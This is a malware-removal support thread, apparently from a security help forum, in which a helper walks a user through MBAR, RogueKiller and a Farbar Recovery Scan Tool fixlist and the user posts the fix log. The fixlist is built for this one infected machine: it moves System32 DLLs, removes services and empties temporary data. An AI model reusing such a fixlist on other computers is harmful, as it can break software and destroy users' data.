  • Click OK to extract it to your Desktop (MBAR will be launched shortly after the extraction);
  • Click on Next, and then on the Update button to let it update its database. Once the database has been successfully updated, click on Next;
  • Make sure all the checkboxes are checked, then click on the Scan button, and let it completes its scan (this can take a while);
  • Once the scan is done, if threats are found, make sure that every item is checked, and click on the Cleanup button (a reboot might be required);
  • After that (and the reboot, if one was required), go back in the mbar folder and look for a text file called mbar-log-TODAY'S-DATE.txt;
  • Please copy and paste the entire content of that log in your next reply;

 

 

Next,

Please download RogueKiller 32/64 Bits Installer (setup.exe) by Tigzy and save it to your computer's Desktop.

  • Right click on the file setup.exe and select Run as administrator to install the tool.
  • Click Yes to accept any security warnings that may appear.
  • Choose the installation language and click OK.
  • Checkmark "Install 32 and 64 bits versions" and click Next. Follow the steps to install the tool.
  • Now close all programs and browsers.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • Right-click on the RogueKiller icon and select Run as administrator.
  • Click Yes to accept any security warnings that may appear.
  • Click the Scan tab and then click the Start Scan button.
  • Wait until the scan has finished. This may take some time consuming.
  • Once finished click on Open Report. It will open a new window.
  • Click Export TXT to export the report as a text file, give a name to the file such as RKlog.txt and save it to your Desktop.
  • Close RogueKiller.
  • Please copy and paste the entire content of RKlog.txt in your next reply.

 

To summarize, please post in your next reply the contents of:
The fixlog.txt file;
The mbar-log-TODAY'S-DATE.txt file;
The Rklog.txt file.
 

Let me see those logs and tell me how is the computer running at this point.

 

Thank you.


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#8 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 09 April 2017 - 04:29 PM

I moved the .exe file to my desktop.

I'm not sure if I correctly ran the FRST64.exe file the first time.  The 2 logs are saved as notepad documents on my desktop, not in a folder.

I'm not sure how to save the fixlist document to the .exe file. Please advise how I should proceed.  Thank you

 

ok, I think I understand now....the .exe file is on desktop, just make sure the fixlist document is on my desktop. It doesn't have to be in a FRST folder.


Edited by krtate, 09 April 2017 - 04:46 PM.


#9 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 09 April 2017 - 05:06 PM

Fix result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by KEKLR (09-04-2017 17:48:02) Run:1
Running from C:\Users\KEKLR\Desktop
Loaded Profiles: KEKLR (Available Profiles: KEKLR)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
 CreateRestorePoint:
 CloseProcesses:
 EmptyTemp:
 HKLM-x32\...\Run: [] => [X]
 HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Policies\Explorer: [NoSaveSettings] 00000000
 HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2**
 Startup: C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk [2017-04-08]
 ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 ()
 HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
 HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
 HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
 HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
 HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
 HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
 SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
 SearchScopes: HKLM -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
 SearchScopes: HKLM -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
 SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
 SearchScopes: HKLM-x32 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
 SearchScopes: HKLM-x32 -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
 SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
 SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL =
 SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} URL = hxxp://search.avg.com/route/?d=4b3d2cf0&i=23&tp=chrome&q={searchTerms}&lng={language}&ychte=us&nt=1
 Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
 FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
 FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
 FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
 FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
 FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
 CHR Extension: (Chrome Web Store Payments) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-07-07]
 CHR Extension: (Chrome Media Router) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-22]
 S3 catchme; \??\C:\ComboFix\catchme.sys [X]
 U4 eabfiltr; no ImagePath
 S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
 S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
 2017-04-08 13:45 - 2017-03-07 07:44 - 00000000 ____D C:\Users\KEKLR\AppData\Local\b3751cf7
 2017-03-24 10:43 - 2017-03-08 07:27 - 00000000 ____D C:\Users\KEKLR\AppData\Local\fc867bd779
 2016-07-27 23:59 - 2016-07-27 23:59 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033}
 2011-06-16 22:33 - 2011-06-16 22:33 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D}
 2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
 2009-08-09 04:42 - 2009-08-09 04:43 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
 2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
 2009-08-09 04:36 - 2009-08-09 04:38 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
 2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
 2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
 2009-08-09 04:35 - 2009-08-09 04:35 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
 2009-08-09 04:38 - 2009-08-09 04:42 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
 2009-08-25 05:06 - 2009-08-25 05:06 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log
 ZeroAccess:
 C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b}
 2016-11-24 18:47 - 2016-11-24 18:47 - 0066048 _____ () C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe
 2016-11-24 18:47 - 2014-05-07 17:43 - 0568832 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll
 2016-11-24 18:47 - 2014-05-07 17:43 - 0655872 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll
 2016-11-23 11:51 - 2016-11-23 11:51 - 0490348 _____ () C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe
 2006-05-24 11:10 - 2006-05-24 11:10 - 0455600 ____R (Macrovision Corporation) C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe
 C:\Windows\System32\igdumd32.dll
 C:\Windows\System32\igdumdx32.dll
 C:\Windows\System32\MFC71.DLL
 C:\Windows\System32\MFC71U.DLL
 C:\Windows\System32\MSVBVM60.DLL
 C:\Windows\System32\MSVCP71.dll
 C:\Windows\System32\MSVCR71.dll
 C:\Windows\System32\olepro32.DLL
 Task: {510B196C-5350-4298-B4D2-AF749C488825} - System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => pcalua.exe -a "C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" -d C:\Users\KEKLR\Desktop
 C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe
 2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumdx32.dll
 2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumd32.dll
 2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCP71.dll
 2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCR71.dll
 2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71.DLL
 2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71U.DLL
 FirewallRules: [TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
 FirewallRules: [UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
 C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
 C:\users\keklr\appdata\local\temp\7zs14ca
 End
*****************

Restore point was successfully created.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSaveSettings => value removed successfully
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\system\\WallpaperStyle => value removed successfully
C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk => moved successfully
ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 () => not found.
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main\\Search Page => value removed successfully
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main\\Start Page => value removed successfully
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key removed successfully
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key removed successfully
HKCR\CLSID\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key not found.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{22348997-7FD7-4759-AB9D-EB2B7A365617} => key removed successfully
HKCR\CLSID\{22348997-7FD7-4759-AB9D-EB2B7A365617} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key removed successfully
HKCR\Wow6432Node\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key removed successfully
HKCR\Wow6432Node\CLSID\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{22348997-7FD7-4759-AB9D-EB2B7A365617} => key removed successfully
HKCR\Wow6432Node\CLSID\{22348997-7FD7-4759-AB9D-EB2B7A365617} => key not found.
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key removed successfully
HKCR\CLSID\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key not found.
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} => key removed successfully
HKCR\CLSID\{171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} => key not found.
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} => key removed successfully
HKCR\CLSID\{18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{CCC7A320-B3CA-4199-B1A6-9F516DD69829} => value removed successfully
HKCR\Wow6432Node\CLSID\{CCC7A320-B3CA-4199-B1A6-9F516DD69829} => key not found.
HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@adobe.com/ShockwavePlayer => key removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully
"C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll" => not found.
"C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll" => not found.
C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda => moved successfully
C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm => moved successfully
HKLM\System\CurrentControlSet\Services\catchme => key removed successfully
catchme => service removed successfully
HKLM\System\CurrentControlSet\Services\eabfiltr => key removed successfully
eabfiltr => service removed successfully
HKLM\System\CurrentControlSet\Services\RtsUIR => key removed successfully
RtsUIR => service removed successfully
HKLM\System\CurrentControlSet\Services\USBCCID => key removed successfully
USBCCID => service removed successfully
C:\Users\KEKLR\AppData\Local\b3751cf7 => moved successfully
C:\Users\KEKLR\AppData\Local\fc867bd779 => moved successfully
C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033} => moved successfully
C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D} => moved successfully
C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log => moved successfully
C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log => moved successfully
C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log => moved successfully
C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log => moved successfully
C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log => moved successfully
C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log => moved successfully
C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log => moved successfully
C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log => moved successfully
C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log => moved successfully
ZeroAccess: => Error: No automatic fix found for this entry.
C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b} => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe => moved successfully
C:\Windows\System32\igdumd32.dll => moved successfully
C:\Windows\System32\igdumdx32.dll => moved successfully
C:\Windows\System32\MFC71.DLL => moved successfully
C:\Windows\System32\MFC71U.DLL => moved successfully
C:\Windows\System32\MSVBVM60.DLL => moved successfully
C:\Windows\System32\MSVCP71.dll => moved successfully
C:\Windows\System32\MSVCR71.dll => moved successfully
C:\Windows\System32\olepro32.DLL => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{510B196C-5350-4298-B4D2-AF749C488825} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{510B196C-5350-4298-B4D2-AF749C488825} => key removed successfully
C:\Windows\System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => key removed successfully
"C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" => not found.
"C:\Windows\system32\igdumdx32.dll" => not found.
"C:\Windows\system32\igdumd32.dll" => not found.
"C:\Windows\system32\MSVCP71.dll" => not found.
"C:\Windows\system32\MSVCR71.dll" => not found.
"C:\Windows\system32\MFC71.DLL" => not found.
"C:\Windows\system32\MFC71U.DLL" => not found.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe => value removed successfully
"C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe" => not found.
"C:\users\keklr\appdata\local\temp\7zs14ca" => not found.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 108072107 B
Java, Flash, Steam htmlcache => 1183 B
Windows/system/drivers => 2557668680 B
Edge => 0 B
Chrome => 577119028 B
Firefox => 123353957 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 33125 B
Public => 0 B
ProgramData => 0 B
systemprofile => 42320376 B
systemprofile32 => 93214 B
LocalService => 803988 B
NetworkService => 171880396 B
KEKLR => 1626892714 B

RecycleBin => 846813270 B
EmptyTemp: => 5.6 GB temporary data Removed.

================================

The system needed a reboot.

==== End of Fixlog 17:57:38 ====



#10 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 09 April 2017 - 05:09 PM

Hello.

 

Okay, no problem with that, I will give you instructions step by step.

 

Make sure FRST64 is placed in your computer's Desktop.

 

Now open Notepad, then copy the entire content of the Quote box below and paste it in to the open Notepad document.

To do this left click on the mouse inside the Quote box below, highlight all the content of the box, then right click on the highlighted content and select Copy.
Then click inside the blank open Notepad, right-click and paste.

Start
CreateRestorePoint:
CloseProcesses:
EmptyTemp:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Policies\Explorer: [NoSaveSettings] 00000000
HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2**
Startup: C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk [2017-04-08]
ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 ()
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL =
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} URL = hxxp://search.avg.com/route/?d=4b3d2cf0&i=23&tp=chrome&q={searchTerms}&lng={language}&ychte=us&nt=1
Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
CHR Extension: (Chrome Web Store Payments) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-07-07]
CHR Extension: (Chrome Media Router) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-22]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U4 eabfiltr; no ImagePath
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
2017-04-08 13:45 - 2017-03-07 07:44 - 00000000 ____D C:\Users\KEKLR\AppData\Local\b3751cf7
2017-03-24 10:43 - 2017-03-08 07:27 - 00000000 ____D C:\Users\KEKLR\AppData\Local\fc867bd779
2016-07-27 23:59 - 2016-07-27 23:59 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033}
2011-06-16 22:33 - 2011-06-16 22:33 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D}
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2009-08-09 04:42 - 2009-08-09 04:43 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2009-08-09 04:36 - 2009-08-09 04:38 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2009-08-09 04:35 - 2009-08-09 04:35 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2009-08-09 04:38 - 2009-08-09 04:42 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log
ZeroAccess:
C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b}
2016-11-24 18:47 - 2016-11-24 18:47 - 0066048 _____ () C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe
2016-11-24 18:47 - 2014-05-07 17:43 - 0568832 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll
2016-11-24 18:47 - 2014-05-07 17:43 - 0655872 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll
2016-11-23 11:51 - 2016-11-23 11:51 - 0490348 _____ () C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe
2006-05-24 11:10 - 2006-05-24 11:10 - 0455600 ____R (Macrovision Corporation) C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe
C:\Windows\System32\igdumd32.dll
C:\Windows\System32\igdumdx32.dll
C:\Windows\System32\MFC71.DLL
C:\Windows\System32\MFC71U.DLL
C:\Windows\System32\MSVBVM60.DLL
C:\Windows\System32\MSVCP71.dll
C:\Windows\System32\MSVCR71.dll
C:\Windows\System32\olepro32.DLL
Task: {510B196C-5350-4298-B4D2-AF749C488825} - System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => pcalua.exe -a "C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" -d C:\Users\KEKLR\Desktop
C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumdx32.dll
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumd32.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCP71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCR71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71.DLL
